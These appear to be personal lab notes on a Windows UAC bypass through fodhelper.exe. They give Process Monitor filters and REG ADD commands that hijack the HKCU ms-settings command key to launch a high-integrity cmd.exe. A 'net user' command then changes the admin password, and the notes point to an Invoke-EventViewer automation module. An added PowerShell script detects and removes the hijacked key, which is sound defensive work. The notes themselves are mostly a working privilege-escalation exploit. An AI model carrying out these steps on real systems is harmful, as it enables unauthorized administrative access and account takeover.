UAC bypass
User Account Control
Vulnerable binary used in this example: fodhelper.exe
Gather info about the exe's integrity level and the permission it requests.
Tool: sigcheck.exe
- In cmd, cd to the SysinternalsSuite directory
sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe
- It shows that requireAdministrator is set in the manifest and autoElevate is true
Gather info about how this exe interacts with the file system and the Windows registry.
Tool: Procmon.exe (Process Monitor) from Sysinternals
- Open Procmon.exe, start fodhelper.exe, and add the filters below
- Filter: Process Name, is, fodhelper.exe, Include
- Filter: Operation, contains, Reg, Include
- Filter: Result, is, NAME NOT FOUND, Include
- Filter: Path, contains, HKCU, Include
- Now apply the filters and look for an interesting path that can be modified.
For ex:
HKCU:\Software\Classes\ms-settings\shell\open\command can be checked.
- Now change the Path filter and remove the Result filter
Filter:
Path, contains, ms-settings\shell\open\command, Include
- Check whether the process successfully accesses that key in some other hive; the results give more clues. When HKCU:\Software\Classes\ms-settings\shell\open\command is not found, it falls back to HKCR, where the key exists and the access succeeds.
- Because the exe looks up HKCU:\Software\Classes\ms-settings\shell\open\command first, and we have the necessary permission to write under HKCU, that path can be modified.
- Add this key with REG utility in cmd
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
- Now restart fodhelper.exe and apply the first four filters
- The vulnerable exe looks for DelegateExecute in the newly added key
- Add DelegateExecute with an empty value in cmd
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
- Again, restart fodhelper.exe and apply the 1st, 2nd and 4th filters
- This time the lookup is successful, but since DelegateExecute is empty it also looks for the (Default) entry value of the Shell\open\command registry key. The (Default) value is created as null automatically when any registry key is added.
- Replace the empty (Default) value with an executable of our choice, cmd.exe, in cmd
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
Exploit
- Restart fodhelper.exe; it now opens cmd.exe automatically at high integrity level
- To check whether high integrity was achieved, try to change the admin password
net user admin Ev!lpass
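A defender-side check, added here and not part of the original notes: this PowerShell script audits the per-user registry key the technique above relies on (absent on a clean system) and optionally removes it. The function name Test-FodhelperHijack and the -Remediate switch are my own.

```powershell
# Added example (not from the original notes): audit the HKCU key that the
# fodhelper.exe technique stages. On a clean system HKCU\Software\Classes\
# ms-settings does not exist, so its presence, a DelegateExecute value, or a
# command in (Default) is a strong indicator that the bypass was prepared.
# Run in the context of the user being inspected. Removal only happens when
# -Remediate is passed.
param(
    [switch]$Remediate
)

$KeyPath = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'

function Test-FodhelperHijack {
    param([string]$Path = $KeyPath, [switch]$Remediate)

    if (-not (Test-Path -Path $Path)) {
        Write-Output "OK: $Path is absent (expected on a clean system)."
        return $false
    }

    $item     = Get-Item -Path $Path
    $default  = $item.GetValue('')                # (Default) value, $null if unset
    $delegate = $item.GetValue('DelegateExecute')  # $null if the value is missing

    Write-Warning "Suspicious: $Path exists."
    Write-Warning ("  (Default)       = '{0}'" -f $default)
    Write-Warning ("  DelegateExecute = '{0}'" -f $delegate)

    if ($Remediate) {
        # Remove the whole ms-settings entry under HKCU. The legitimate handler
        # lives under HKCR/HKLM and is not touched by this.
        Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
        Write-Output 'Removed HKCU:\Software\Classes\ms-settings.'
    }
    return $true
}

Test-FodhelperHijack -Remediate:$Remediate
```

For continuous monitoring rather than a one-off check, the same key path is the natural target for registry-write auditing (for example Sysmon registry events), since a legitimate process has no reason to create it.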
Automation tool
- Import-Module .\Invoke-EventViewer.ps1
- Invoke-EventViewer cmd.exe